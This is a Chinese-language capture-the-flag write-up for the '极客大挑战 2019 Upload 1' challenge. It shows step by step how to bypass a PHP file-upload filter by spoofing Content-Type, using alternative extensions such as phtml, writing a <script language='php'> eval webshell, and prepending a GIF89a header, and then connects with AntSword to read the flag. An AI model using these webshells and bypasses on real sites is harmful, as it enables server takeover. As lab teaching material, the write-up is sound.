[极客大挑战 2019]Upload 1
进去就是个文件选择框, 先上传个头像上去看看, 用BP抓包
data:image/s3,"s3://crabby-images/86a92/86a929880354e9ed51159565e77f189b78dcf732" alt="image-20211101161653416"
data:image/s3,"s3://crabby-images/dee6f/dee6f6b9d683a1d795074bb61624748d064a100a" alt="image-20211101161704616"
正常上传,
下面我们新建个test.php
一句话木马文件并上传试试
1 | eval($_REQUEST["shell"]) @ |
data:image/s3,"s3://crabby-images/f58db/f58db103117c82e7f1fd70e01a581d7730fe0864" alt="image-20211101172102928"
data:image/s3,"s3://crabby-images/cf2d6/cf2d6e6f217728f5ef47676a60f9abee2dddfa3a" alt="image-20211031211321256"
显然是不行的, 被识别出来了,
用BP抓包改Content-Type
为image/jpeg
看看能不能骗过去
data:image/s3,"s3://crabby-images/c1f60/c1f60e75a820cc4ec92e16efc55d1b2d2bc22361" alt="image-20211031220038474"
错误提示变了,但还是传不上去, 推测可能是文件后缀检测,
可以采用其他后缀绕过,
常见的后缀有php*(如php2, php3), pht, phtm, phtml, phps
等
我们试试把后缀改成phtml
试试
注意: 有的后缀即使上传上去了也不能被执行, 取决于服务端配置
data:image/s3,"s3://crabby-images/11e69/11e693861ed07f1d2689eb83011aae46803e4637" alt="image-20211031222954778"
错误变了, 说明改后缀是对的, 但是这次又遇到新的检测.
让代码里不包含<?
, 只需要换个形式的一句话木马即可:
1 | <script langage="php">@eval(@_REQUEST);</script> |
data:image/s3,"s3://crabby-images/3423e/3423eeb6959adca50b4248a007fa993038b63dbd" alt="image-20211031223351820"
错误又变了, 被检测到不是图像文件, 检测文件类型很有可能根据文件头了, 我们试着给一句话木马加上一个图像文件的文件头绕过检测
常见的图片文件头
- JPG :FF D8 FF E0 00 10 4A 46 49 46
- GIF(相当于文本的GIF89a):47 49 46 38 39 61
- PNG: 89 50 4E 47
1 | GIF89a |
GIF的文件头最容易添加, 所以这里我们采用它, 其他文件的文件头要利用010 Editor这种十六进制编辑器来进行操作, 不方便
data:image/s3,"s3://crabby-images/aeaab/aeaabced2be37b2f4819d5b6afd0f2491ba90d51" alt="image-20211101163042319"
一句话木马成功上传了上去, 猜测上传的文件放在upload文件夹中, 试着访问一下执行个指令
data:image/s3,"s3://crabby-images/3e405/3e405d7ef9e5ccfb527eb754c029f68f5cee7364" alt="image-20211101163250245"
成功执行, 接下来为了方便操作, 省去手工使用指令的麻烦,
使用中国菜刀
和中国蚁剑
之类的软件连接webshell
,
这里我使用中国蚁剑
.
data:image/s3,"s3://crabby-images/63fe8/63fe82c6df2131ec89244592b98092fed4556cf3" alt="image-20211101163537861"
成功连接, 接下来我们只需要找到flag即可, 通过翻查文件目录, 发现flag文件就在根目录
data:image/s3,"s3://crabby-images/489d7/489d7101d1a6cb76adf2f53fc8114afe9a762de3" alt="image-20211101163731288"
任务完成~